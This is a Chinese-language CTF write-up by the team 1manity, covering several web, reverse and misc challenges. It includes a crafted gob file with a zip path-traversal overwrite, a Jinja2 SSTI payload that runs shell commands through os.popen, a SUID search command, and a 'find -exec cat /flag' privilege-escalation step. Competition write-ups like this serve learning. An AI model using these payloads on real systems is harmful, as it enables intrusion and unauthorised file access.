1manity’s WriteUp

随便写了点,没写多清楚,(一整个懒住QWQ)

37980-qbevi01bwk.png

队伍名称

1manity

排名

13名

解题思路

WEB

象棋王子

简单游戏题

image-20230218144340126

找到胜利的逻辑,控制台运行

image-20230218144410414

电子木鱼

rust整数溢出

Cost扣10功德 乘上1073741824就溢出了 -i32变正i32了。就不多说了

image-20230218144520867

image-20230218144533268

BabyGo

gob反序列化+沙箱逃逸

生成gob文件

package main

import (
    "encoding/gob"
    "fmt"
    "os"
)

type User struct {
    Name  string
    Path  string
    Power string
}

func main() {
    fmt.Println("Hello World")
    userDir := "/tmp/b1a6761e169cd3774fa99ebfc114aa29/"
    info := User{Name: "ctfer", Path: userDir, Power: "admin"}
    name := "user.gob"
    File, _ := os.OpenFile(name, os.O_RDWR|os.O_CREATE, 0777)
    defer File.Close()
    enc := gob.NewEncoder(File)
    if err := enc.Encode(info); err != nil {
        fmt.Println(err)
    }
}

压缩包上传后解压时path传参../,把user.gob解压到上级目录覆盖

go沙箱逃逸,找到文章了,一模一样的

https://www.ctfiot.com/55141.html

image-20230218144707664

REVERSE

PZGalaxy

这不也是web嘛。。。

F12打开看到关键代码,然后爆破一下。直接放控制台就跑完了

function Leaf(k, p) {
    var s = [], j = 0, x, res = '';
    for (var i = 0; i < 256; i++) {
        s[i] = i;
    }
    for (i = 0; i < 256; i++) {
        j = (j + s[i] + k.charCodeAt(i % k.length)) % 256;
        x = s[i];
        s[i] = s[j];
        s[j] = x;
    }
    i = 0;
    j = 0;
    for (var y = 0; y < p.length; y++) {
        i = (i + 1) % 256;
        j = (j + s[i]) % 256;
        x = s[i];
        s[i] = s[j];
        s[j] = x;
        res += String.fromCharCode(p.charCodeAt(y) ^ s[(s[i] + s[j]) % 256]);
    }
    return res;
}

function f() {
    for(let i=0;i<=114514;i++){
      str1="2023";
      str2= i.toString();
      var date =str1 + str2.padStart(4, '0') ;
        
      var enc = ['¦', 'p', ':', 'Ü', '\x92', 'Ã', '\x97', 'ó', '\x1A', 'ß', '\b', 'Ö', 'A', ' ', '5', '\x90', '{', '\x06', 'Ô', '÷', 's', '_', '\x1D', ':', 'I', 'L', 'C', 'X', 'Ñ', '¹', 'O', '\x99', '\x85', '3', 'à', 'i', '|'];
      flag = Leaf(date, enc.join(''));

      if ( flag.substring(0, 4) ==  "flag" && date.length == 8 && date.substring(0, 4) == "2023"){
        console.log(flag);
          break;
      } 

    }    
}
f()

image-20230218235330085

exp 请粘贴代码,不允许截图。

MISC

验证码

根据提示tupper塔珀自指公式

image-20230218154847994

Snake on web

几分钟秒了,没想到是一血。。。

import time

import keyboard

keyboard.press_and_release("alt+tab")
while 1:
    keyboard.press_and_release("s")
    time.sleep(0.1)
    keyboard.press_and_release("a")
    time.sleep(1.8)
    keyboard.press_and_release("s")
    time.sleep(0.1)
    keyboard.press_and_release("d")
    time.sleep(1.8)

直接遍历地图,玩会手机flag就到手了

image-20230218233950209

LSSTIB

很web的misc,LSB隐写加SSTI加SUID提权,题目本身提示全了

# -*- coding: UTF-8 -*-
from PIL import Image
 
def getHideString(hide_string):
  #获取要隐藏的文件内容
  tmp = hide_string
  f = file(tmp,"rb")
  str_bin = ""
  s = f.read()
  for i in range(len(s)):
    str_bin = str_bin + str(bin(ord(s[i])).replace('b','')).zfill(8)
    #print str
  f.closed
  return str_bin
 
def mod(x,y):
  return x%y;
#original_file为载体图片路径,hide_string为隐写文件,new_file为加密图片保存的路径
def encode(original_file,hide_string,new_file):  
  im = Image.open(original_file)
  #获取图片的宽和高
  width = im.size[0]
  print "width:"+str(width)+"\n"
  height = im.size[1]
  print "height:"+str(height)+"\n"
  count = 0
  #获取需要隐藏的信息
  key = getHideString(hide_string)
  keylen = len(key)
  for h in range(0,height):
    for w in range(0,width):
      pixel = im.getpixel((w,h))
      R = pixel[0]
      G = pixel[1]
      B = pixel[2]
      if count == keylen:
        break
      #分别将每个像素点的RGB值余2,这样可以获得最低位的值,然后用原来的值减去最低位的值
      #再从需要隐藏的信息中取出一位,转换为整型
      #两值相加,需要隐藏的信息就将原来的最低位信息替换掉了
      R= R-mod(R,2)+int(key[count])
      count+=1
      if count == keylen:
        im.putpixel((w,h),(R,G,B))
        break
      G =G-mod(G,2)+int(key[count])
      count+=1
      if count == keylen:
        im.putpixel((w,h),(R,G,B))
        break
      B= B-mod(B,2)+int(key[count])
      count+=1
      if count == keylen:
        im.putpixel((w,h),(R,G,B))
        break
      if count % 3 == 0:
        im.putpixel((w,h),(R,G,B))
  im.save(new_file)
 
#原图
original_file = "Projectile1-export.png"
#处理后输出的图片路径
new_file = "Projectile1-export.png-stego.png"
#需要隐藏的信息
hide_string = "4.txt"
encode(original_file,hide_string,new_file)

网上找的脚本,官方的SSTI payload

suid提权

find / -perm -u=s -type f 2>/dev/null
{% for c in [].__class__.__base__.__subclasses__() %}
{% if c.__name__=='catch_warnings' %}
{{ c.__init__.__globals__['__builtins__'].eval("__import__('os').popen('find lsb.py -exec cat /flag \;').read()")}}
{% endif %}
{% endfor %}

2023-02-19T16:36:02.png

仅有一条评论

发表评论